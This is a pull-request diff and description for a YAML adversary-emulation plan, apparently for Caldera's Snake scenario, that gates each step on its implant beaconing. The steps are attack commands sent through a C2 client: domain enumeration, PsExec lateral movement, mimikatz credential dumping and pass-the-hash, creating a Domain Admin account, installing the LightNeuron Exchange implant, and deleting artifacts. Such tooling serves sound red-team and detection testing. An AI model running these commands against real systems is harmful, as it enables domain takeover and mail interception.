-          ./evalsC2client.py --set-and-complete-task 218780a0-870e-480e-b2c5dc 'exe | C:\\Users\\#{first.target.user}\\Desktop\\gusbsys.exe -f' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{first.epic.id} 'exe | C:\\Users\\#{first.target.user}\\Desktop\\gusbsys.exe -f' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.epic.id
 
 - id: cb7d5320-981f-496e-bdb0-b6535025e59e
   name: Refresh Edge browser (User)
@@ -303,7 +332,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 534b40585d514b554844 '{"type": 3, "proc": "tasklist.exe", "args": "/v"}' --task-wait-timeout 60 | grep '#{file.server.admin}' -i
+          ./evalsC2client.py --set-and-complete-task #{first.snake.id} '{"type": 3, "proc": "tasklist.exe", "args": "/v"}' --task-wait-timeout 60 | grep '#{file.server.admin}' -i
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.snake.id
 
 - id: 5dbc34ff-eb4d-4897-8c4e-8288e5dd9e88
   name: Enumerate file server admin groups (Adversary)
@@ -319,7 +351,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 534b40585d514b554844 '{"type": 3, "proc": "net.exe", "args": "user /domain #{file.server.admin}"}' --task-wait-timeout 60 | grep 'File Server Admins' -i
+          ./evalsC2client.py --set-and-complete-task #{first.snake.id} '{"type": 3, "proc": "net.exe", "args": "user /domain #{file.server.admin}"}' --task-wait-timeout 60 | grep 'File Server Admins' -i
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.snake.id
 
 - id: 6315f9e9-a6ee-46f2-b846-24f9c3c219c9
   name: Enumerate mapped network drives (Adversary)
@@ -335,13 +370,15 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 534b40585d514b554844 '{"type": 3, "proc": "net.exe", "args": "use", "runas": "#{network.domain.name}\\#{first.target.user}"}' --task-wait-timeout 60 | grep #{second.target.host} -i
+          ./evalsC2client.py --set-and-complete-task #{first.snake.id} '{"type": 3, "proc": "net.exe", "args": "use", "runas": "#{network.domain.name}\\#{first.target.user}"}' --task-wait-timeout 60 | grep #{second.target.host} -i
   input_arguments:
     second.target.host: 
       description: The hostname of the second target host.
       type: string
       default: berzas
-
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.snake.id
 
 # Step 14 - Lateral Movement to File Server
 
@@ -359,7 +396,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 534b40585d514b554844 '{"type": 4, "file": "PsExec.exe", "dest":"C:\\Windows\\System32\\file_svc_mgr.exe"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{first.snake.id} '{"type": 4, "file": "PsExec.exe", "dest":"C:\\Windows\\System32\\file_svc_mgr.exe"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.snake.id
 
 - id: f6c54eb3-f066-4721-812f-0bf6bfea01fc
   name: Download the 2nd Snake installer (Adversary)
@@ -375,7 +415,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 534b40585d514b554844 '{"type": 4, "file": "installer_v2.exe", "dest":"C:\\Windows\\System32\\cmu_svc_v2.exe"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{first.snake.id} '{"type": 4, "file": "installer_v2.exe", "dest":"C:\\Windows\\System32\\cmu_svc_v2.exe"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.snake.id
 
 - id: 0970d7d6-279a-4ad8-a334-cfe0b5e7e0a6
   name: Execute PsExec as the File Server Administrator (Adversary)
@@ -391,8 +434,11 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 534b40585d514b554844 '{"type": 3, "proc": "C:\\Windows\\System32\\file_svc_mgr.exe", "args":"\\\\#{second.target.host} -accepteula -s -c C:\\Windows\\System32\\cmu_svc_v2.exe", "runas":"#{network.domain.name}\\#{file.server.admin}"}' --task-wait-timeout 120
+          ./evalsC2client.py --set-and-complete-task #{first.snake.id} '{"type": 3, "proc": "C:\\Windows\\System32\\file_svc_mgr.exe", "args":"\\\\#{second.target.host} -accepteula -s -c C:\\Windows\\System32\\cmu_svc_v2.exe", "runas":"#{network.domain.name}\\#{file.server.admin}"}' --task-wait-timeout 120
         timeout: 120
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.snake.id
 
 - id: 2386792f-7bc9-445d-b868-64a0031ea40d
   name: RDP to second target host (User)
@@ -456,7 +502,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 534b40585d514b554844 '{"type": 1, "command": "del /Q C:\\Windows\\System32\\file_svc_mgr.exe C:\\Windows\\System32\\cmu_svc_v2.exe"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{first.snake.id} '{"type": 1, "command": "del /Q C:\\Windows\\System32\\file_svc_mgr.exe C:\\Windows\\System32\\cmu_svc_v2.exe"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.snake.id
 
 
 # Step 15 - Domain Discovery
@@ -475,7 +524,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Get-Module -ListAvailable -Name ActiveDirectory"}' --task-wait-timeout 60 | grep ActiveDirectory -i
+          ./evalsC2client.py --set-and-complete-task #{second.snake.id} '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Get-Module -ListAvailable -Name ActiveDirectory"}' --task-wait-timeout 60 | grep ActiveDirectory -i
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.snake.id
 
 - id: 70a19730-04e9-45be-8463-7a359eaee657
   name: Enumerate Active Directory groups (Adversary)
@@ -491,7 +543,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroup -Filter * | Where-Object Name -Match \"management\" | Select Name"}' --task-wait-timeout 60 | grep 'Server Management' -i
+          ./evalsC2client.py --set-and-complete-task #{second.snake.id} '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroup -Filter * | Where-Object Name -Match \"management\" | Select Name"}' --task-wait-timeout 60 | grep 'Server Management' -i
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.snake.id
 
 - id: bb06008c-561b-4a98-992e-fb7a0432aa45
   name: Enumerate accounts belonging to the Server Management domain group (Adversary)
@@ -507,12 +562,15 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroupMember -Identity \"Server Management\" | Select Name,SamAccountName"}' --task-wait-timeout 60 | grep #{domain.admin.user} -i
+          ./evalsC2client.py --set-and-complete-task #{second.snake.id} '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroupMember -Identity \"Server Management\" | Select Name,SamAccountName"}' --task-wait-timeout 60 | grep #{domain.admin.user} -i
   input_arguments:
     domain.admin.user: 
       description: The username of a domain admin.
       type: string
       default: ZilvinasAdmin
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.snake.id
 
 - id: 8649c19c-0e25-43f3-a267-e0c0c92dd74f
   name: Enumerate accounts belonging to the Domain Admins domain group (Adversary)
@@ -528,7 +586,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroupMember -Identity \"Domain Admins\" | Select Name,SamAccountName"}' --task-wait-timeout 60 | grep #{domain.admin.user} -i
+          ./evalsC2client.py --set-and-complete-task #{second.snake.id} '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroupMember -Identity \"Domain Admins\" | Select Name,SamAccountName"}' --task-wait-timeout 60 | grep #{domain.admin.user} -i
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.snake.id
 
 - id: d761e02e-fea4-457e-a434-aa49383b7996
   name: Enumerate account information (Adversary)
@@ -544,8 +605,11 @@
     linux:
       sh:
         command: |
-          output=$(./evalsC2client.py --set-and-complete-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADUser -Filter {LastLogonDate -ne 0} -Properties * | Select Name,SamAccountName"}' --task-wait-timeout 60);
+          output=$(./evalsC2client.py --set-and-complete-task #{second.snake.id} '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADUser -Filter {LastLogonDate -ne 0} -Properties * | Select Name,SamAccountName"}' --task-wait-timeout 60);
           echo $output | grep '#{second.target.user}' -iw && echo $output | grep '#{domain.admin.user}' -i
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.snake.id
 
 - id: 44daae27-4c78-4a38-9a68-88aeabd87a32
   name: Enumerate domain computer information (Adversary)
@@ -561,7 +625,7 @@
     linux:
       sh:
         command: |
-          output=$(./evalsC2client.py --set-and-complete-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADComputer -Filter * -Properties * | Select Name,DnsName,IPv4Address,Description"}' --task-wait-timeout 60);
+          output=$(./evalsC2client.py --set-and-complete-task #{second.snake.id} '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADComputer -Filter * -Properties * | Select Name,DnsName,IPv4Address,Description"}' --task-wait-timeout 60);
           echo $output | grep '#{second.target.user} Workstation' -i && echo $output | grep '#{fourth.target.host}' -i
   input_arguments:
     fourth.target.host: 
@@ -572,6 +636,9 @@
       description: The username of the second target host.
       type: string
       default: Zilvinas
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.snake.id
 
 
 # Step 16 - Preparation for Lateral Movement to Admin Workstation
@@ -590,7 +657,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 5054474d50435a51404b '{"type": 4, "file": "mimikatz.exe", "dest": "C:\\Windows\\System32\\loadperf.exe"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{second.snake.id} '{"type": 4, "file": "mimikatz.exe", "dest": "C:\\Windows\\System32\\loadperf.exe"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.snake.id
 
 - id: 55bef1eb-e1b5-46c6-94b9-a9637688d114
   name: Download PsExec to the file server (Adversary)
@@ -606,7 +676,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 5054474d50435a51404b '{"type": 4, "file": "PsExec.exe", "dest": "C:\\Windows\\System32\\fs_mgr.exe"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{second.snake.id} '{"type": 4, "file": "PsExec.exe", "dest": "C:\\Windows\\System32\\fs_mgr.exe"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.snake.id
 
 - id: 095324d9-a6e8-4964-a5ba-92fff6907c2e
   name: Download 3rd Snake installer to the file server (Adversary)
@@ -622,7 +695,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 5054474d50435a51404b '{"type": 4, "file": "installer_v3.exe", "dest":"C:\\Windows\\System32\\cmu_svc.exe"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{second.snake.id} '{"type": 4, "file": "installer_v3.exe", "dest":"C:\\Windows\\System32\\cmu_svc.exe"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.snake.id
 
 - id: 256ed126-a10c-4736-a074-216ab90da8f2
   name: Dump NTLM hashes on the file server (Adversary)
@@ -638,12 +714,15 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 5054474d50435a51404b '{"type": 3, "proc": "C:\\Windows\\System32\\loadperf.exe", "args": "\"pr::d\" \"slsa::lop\" \"quit\""}' --task-wait-timeout 60 | grep #{domain.admin.ntlm}
+          ./evalsC2client.py --set-and-complete-task #{second.snake.id} '{"type": 3, "proc": "C:\\Windows\\System32\\loadperf.exe", "args": "\"pr::d\" \"slsa::lop\" \"quit\""}' --task-wait-timeout 60 | grep #{domain.admin.ntlm}
   input_arguments:
     domain.admin.ntlm: 
       description: The NTLM of a domain admin.
       type: string
       default: f3fcd61f987a97da49ce5f650b4e6539
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.snake.id
 
 
 # Step 17 - Lateral Movement to Admin Workstation and Persistence
@@ -662,12 +741,15 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 5054474d50435a51404b '{"type": 3, "proc": "C:\\Windows\\System32\\loadperf.exe", "args": "\"pr::d\" \"slsa::htp /user:#{domain.admin.user} /ntlm:#{domain.admin.ntlm} /domain:#{network.domain.name}.local /remotepc:#{third.target.host} /pexe:C:\\Windows\\System32\\fs_mgr.exe /sys:1 /prun:C:\\Windows\\System32\\cmu_svc.exe\" \"quit\""}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{second.snake.id} '{"type": 3, "proc": "C:\\Windows\\System32\\loadperf.exe", "args": "\"pr::d\" \"slsa::htp /user:#{domain.admin.user} /ntlm:#{domain.admin.ntlm} /domain:#{network.domain.name}.local /remotepc:#{third.target.host} /pexe:C:\\Windows\\System32\\fs_mgr.exe /sys:1 /prun:C:\\Windows\\System32\\cmu_svc.exe\" \"quit\""}' --task-wait-timeout 60
   input_arguments:
     third.target.host: 
       description: The hostname of the third target host.
       type: string
       default: uosis
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.snake.id
 
 - id: 42859ec4-b714-48ca-be74-9438bbbaaf7b
   name: RDP to the third target host (User)
@@ -746,7 +828,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 5054474d50435a51404b '{"type": 1, "command": "del /Q C:\\Windows\\System32\\fs_mgr.exe C:\\Windows\\System32\\loadperf.exe C:\\Windows\\System32\\cmu_svc.exe"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{second.snake.id} '{"type": 1, "command": "del /Q C:\\Windows\\System32\\fs_mgr.exe C:\\Windows\\System32\\loadperf.exe C:\\Windows\\System32\\cmu_svc.exe"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.snake.id
 
 - id: 27083aa1-9a0d-4fe4-9154-fa6f0598e2f9
   name: Enumerate processes (Adversary)
@@ -762,7 +847,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 3, "proc": "tasklist.exe", "args": "/v"}' --task-wait-timeout 60 | grep '#{domain.admin.user}' -i
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 3, "proc": "tasklist.exe", "args": "/v"}' --task-wait-timeout 60 | grep '#{domain.admin.user}' -i
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 - id:  384f3d1f-97f1-4070-98c5-764de023ed2c
   name: Create a new domain user (Adversary)
@@ -779,7 +867,7 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 1, "command": "net user #{new.domain.user} #{new.domain.password} /add /domain", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 1, "command": "net user #{new.domain.user} #{new.domain.password} /add /domain", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60
   input_arguments:
     new.domain.user:
       description: The username of the new domain user.
@@ -789,6 +877,9 @@
       description: The password of the new domain user.
       type: string
       default: Password12345
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 - id: 36d93251-6932-49b9-82ad-994abd27730a
   name: Add the new domain user to the Domain Admins group (Adversary)
@@ -804,7 +895,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 1, "command": "net group \"Domain Admins\" #{new.domain.user} /add /domain", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 1, "command": "net group \"Domain Admins\" #{new.domain.user} /add /domain", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 
 # Step 18 - Lateral Movement to Exchange Server
@@ -823,7 +917,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 4, "file": "ln_transport_agent.dll", "dest":"C:\\Windows\\System32\\mtxconf.dll"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 4, "file": "ln_transport_agent.dll", "dest":"C:\\Windows\\System32\\mtxconf.dll"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 - id: b43fb6c6-05d2-42ff-9083-e70d5dbea078
   name: Download the companion DLL for LightNeuron (Adversary)
@@ -839,7 +936,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 4, "file": "n_installer_aux.dll", "dest":"C:\\Windows\\System32\\mtxcli.dll"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 4, "file": "n_installer_aux.dll", "dest":"C:\\Windows\\System32\\mtxcli.dll"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 - id: bcea95e5-76a0-4774-b51d-cdf6b1fd9ce0
   name: Download the Powershell installation script for LightNeuron (Adversary)
@@ -855,7 +955,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 4, "file": "msiex.ps1", "dest":"C:\\Windows\\System32\\msiex.ps1"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 4, "file": "msiex.ps1", "dest":"C:\\Windows\\System32\\msiex.ps1"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 - id: 62f66621-1ff8-4054-bbd8-b3f374d55199
   name: Download the LightNeuron email rules file (Adversary)
@@ -871,7 +974,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 4, "file": "rules.xml", "dest":"C:\\Windows\\System32\\wdr.rules.xml"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 4, "file": "rules.xml", "dest":"C:\\Windows\\System32\\wdr.rules.xml"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 - id: 09fc13b4-b345-41ce-b5a8-4214a37b627a
   name: Download the LightNeuron config file (Adversary)
@@ -887,7 +993,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 4, "file": "winmail.dat", "dest":"C:\\Windows\\System32\\perfe009.dat"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 4, "file": "winmail.dat", "dest":"C:\\Windows\\System32\\perfe009.dat"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 - id: fea61ba7-d932-4a42-b988-5cf9de3ed118
   name: Copy LightNeuron transport agent DLL to the Exchange Server (Adversary)
@@ -903,7 +1012,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\mtxconf.dll \"\\\\#{fourth.target.host}\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\TransportRoles\\agents\\Hygiene\\Microsoft.Exchange.Transport.Agent.ConnectionFiltering.dll\"", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 1, "command": "copy C:\\Windows\\System32\\mtxconf.dll \"\\\\#{fourth.target.host}\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\TransportRoles\\agents\\Hygiene\\Microsoft.Exchange.Transport.Agent.ConnectionFiltering.dll\"", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 - id: 8c6bfbe8-60f0-4ca8-a955-c35be84be374
   name: Copy LightNeuron companion DLL to the Exchange Server (Adversary)
@@ -919,7 +1031,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\mtxcli.dll \"\\\\#{fourth.target.host}\\C$\\Program Files\\Microsoft\\Exchange Server\\v15\\bin\\exdbdata.dll\"", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 1, "command": "copy C:\\Windows\\System32\\mtxcli.dll \"\\\\#{fourth.target.host}\\C$\\Program Files\\Microsoft\\Exchange Server\\v15\\bin\\exdbdata.dll\"", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 - id: 2d061b67-5d49-4a0c-a7af-1b8a3a6fdd78
   name: Copy PowerShell installation script to the Exchange Server (Adversary)
@@ -935,7 +1050,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\msiex.ps1 \\\\#{fourth.target.host}\\C$\\Windows\\System32\\msiex.ps1", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 1, "command": "copy C:\\Windows\\System32\\msiex.ps1 \\\\#{fourth.target.host}\\C$\\Windows\\System32\\msiex.ps1", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 - id: ded4d5a0-bcd6-41f8-899b-9fa4fddac445
   name: Copy email rules file to the Exchange server (Adversary)
@@ -951,7 +1069,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\wdr.rules.xml \\\\#{fourth.target.host}\\C$\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\msmdat.xml", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 1, "command": "copy C:\\Windows\\System32\\wdr.rules.xml \\\\#{fourth.target.host}\\C$\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\msmdat.xml", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 - id: 0ee2902a-f75e-4367-9e99-2124d3070b4e
   name: Copy config file to the Exchange server (Adversary)
@@ -967,7 +1088,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\perfe009.dat \"\\\\#{fourth.target.host}\\C$\\Program Files\\Microsoft\\Exchange Server\\v15\\bin\\winmail.dat\"", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 1, "command": "copy C:\\Windows\\System32\\perfe009.dat \"\\\\#{fourth.target.host}\\C$\\Program Files\\Microsoft\\Exchange Server\\v15\\bin\\winmail.dat\"", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 - id: 6dd62c1c-b65c-4e28-b241-04121cbbc9af
   name: Install LightNeuron on the Exchange Server (Adversary)
@@ -983,7 +1107,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 3, "proc": "wmic.exe", "args": "/node:#{fourth.target.host} /privileges:enable /output:STDOUT process call create \"cmd.exe /c powershell.exe -File C:\\Windows\\System32\\msiex.ps1 > C:\\Windows\\Temp\\msiexinstallation.log 2>&1\"", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60 | grep 'ReturnValue = 0;' -i
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 3, "proc": "wmic.exe", "args": "/node:#{fourth.target.host} /privileges:enable /output:STDOUT process call create \"cmd.exe /c powershell.exe -File C:\\Windows\\System32\\msiex.ps1 > C:\\Windows\\Temp\\msiexinstallation.log 2>&1\"", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60 | grep 'ReturnValue = 0;' -i
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 - id: 658daa6f-97c0-41c0-af97-d6b4969d2e7c
   name: Check installation log (Adversary)
@@ -999,7 +1126,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 1, "command": "type \\\\#{fourth.target.host}\\C$\\Windows\\Temp\\msiexinstallation.log", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60 | grep "Waiting for service 'Microsoft Exchange Transport (MSExchangeTransport)' to start..." -i
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 1, "command": "type \\\\#{fourth.target.host}\\C$\\Windows\\Temp\\msiexinstallation.log", "runas": "#{network.domain.name}\\#{domain.admin.user}"}' --task-wait-timeout 60 | grep "Waiting for service 'Microsoft Exchange Transport (MSExchangeTransport)' to start..." -i
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 - id: 38023f7d-d776-46bb-bbfc-1f4853e8169b
   name: Delete artifacts from the fourth target host (Adversary)
@@ -1015,7 +1145,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 475e465e424557475b42 '{"type": 1, "command": "del /Q C:\\Windows\\System32\\msiex.ps1 C:\\Windows\\System32\\wdr.rules.xml C:\\Windows\\System32\\mtxconf.dll C:\\Windows\\System32\\mtxcli.dll C:\\Windows\\System32\\perfe009.dat"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.snake.id} '{"type": 1, "command": "del /Q C:\\Windows\\System32\\msiex.ps1 C:\\Windows\\System32\\wdr.rules.xml C:\\Windows\\System32\\mtxconf.dll C:\\Windows\\System32\\mtxcli.dll C:\\Windows\\System32\\perfe009.dat"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.snake.id
 
 
 # Step 19 - Discovery and Email Collection
@@ -1034,7 +1167,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task info@#{network.domain.name}.local '5 | ipconfig /all' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{lightneuron.implant.id} '5 | ipconfig /all' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_lightneuron_registered:
+      - source: lightneuron.implant.id
 
 - id: fdcbcf07-0487-4757-8b09-6c1ce93220b9
   name: Send emails (User)
@@ -1107,4 +1243,7 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task info@#{network.domain.name}.local '3 | 0' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{lightneuron.implant.id} '3 | 0' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_lightneuron_registered:
+      - source: lightneuron.implant.id


### PR DESCRIPTION
## Description

This PR is associated with [https://github.com/mitre/emu/pull/38](https://github.com/mitre/emu/pull/38). 

These changes ensure that an ability will only be run if the implant tasked in that ability is actively beaconing in. This change has been made to both the Snake & Carbon scenarios.

## Type of change

- [x] New feature (non-breaking change which adds functionality)

## How Has This Been Tested?

Tested on the Alpha Range.
Ran through both scenarios to ensure that abilities were run when their requirement was filled (i.e. the implant they were going to task was actively beaconing in). 
Also, spot checked by killing implants to stop them from beaconing in, and then attempting to run abilities that required those implants. Observed that Caldera skipped those abilities because their requirement wasn't filled. 

## Checklist:

- [x] My code follows the style guidelines of this project
- [x] I have performed a self-review of my own code
